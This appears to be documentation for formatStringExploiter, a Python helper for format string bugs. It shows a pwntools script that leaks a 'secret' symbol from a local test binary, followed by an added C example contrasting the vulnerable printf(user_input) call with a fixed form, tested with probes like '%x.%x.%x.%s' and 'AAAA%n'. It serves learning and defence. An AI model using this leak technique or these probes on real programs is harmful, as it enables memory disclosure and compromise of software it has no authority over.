http://formatstringexploiter.readthedocs.io/en/latest/index.html
Helper script for working with format string bugs
Example
```python
from formatStringExploiter.FormatString import FormatString
from pwn import *
import logging

logging.basicConfig(level=logging.WARN)
log = logging.getLogger()

# Binary containing the format string bug; its symbol table supplies the addresses to leak
elf = ELF("formatStringTest")

# Defining format string executor here: takes a format string, runs the
# target with it and returns only the bytes the target printed in response
def exec_fmt(s):
    p = process("./formatStringTest", buffer_fill_size=0xffff)
    p.sendline(s)
    p.recvuntil("Input a format string: ")
    out = p.recvuntil("Logged in", drop=True)
    p.close()
    return out

# Create the class and self-discover the correct offsets
fmtStr = FormatString(exec_fmt, elf=elf)

# Leak some point in memory as a string
fmtStr[elf.symbols['secret']]

# Equivalently, but with caching and more smarts...
fmtStr.leak.s(elf.symbols['secret'])
```
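For contrast with the helper usage above, here is the bug class it probes on the target side, written as an added example that is not part of formatStringExploiter or its test binary: the vulnerable printf-family call beside the fixed one, with a check that the fixed form leaves conversion specifiers in user input inert. The function names and the reuse of the "Input a format string: " prompt are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>

/*
 * Added example (not formatStringExploiter's own code). The bug class the
 * helper above probes is a printf-family call whose format string comes
 * from the user. Function names and the prompt text are illustrative.
 *
 * Vulnerable form, kept as a comment so this file compiles cleanly:
 *
 *     printf(user_input);            // the user input IS the format string
 *
 * There, "%x" and "%s" in the input read whatever sits on the stack and
 * "%n" writes to memory; gcc and clang flag such calls with -Wformat-security.
 */

/* Fixed form: the format is a constant and the user data is bound to a "%s"
 * argument, so any conversion specifiers in the input are copied literally. */
int render_prompt(char *out, size_t n, const char *user_input)
{
    return snprintf(out, n, "Input a format string: %s", user_input);
}

/* Returns 1 when the rendered text still contains the input verbatim, i.e.
 * the specifiers were treated as data rather than interpreted. */
int specifiers_inert(const char *user_input)
{
    char buf[256];
    int len = render_prompt(buf, sizeof buf, user_input);
    if (len < 0 || (size_t)len >= sizeof buf)
        return 0;   /* error or truncation: make no claim */
    return strstr(buf, user_input) != NULL;
}

int main(void)
{
    /* constructed samples: a stack-read probe, a write probe, and plain text */
    const char *samples[] = { "%x.%x.%x.%s", "AAAA%n", "plain text" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        char buf[256];
        render_prompt(buf, sizeof buf, samples[i]);
        printf("%s -> inert=%d\n", buf, specifiers_inert(samples[i]));
    }
    return 0;
}
```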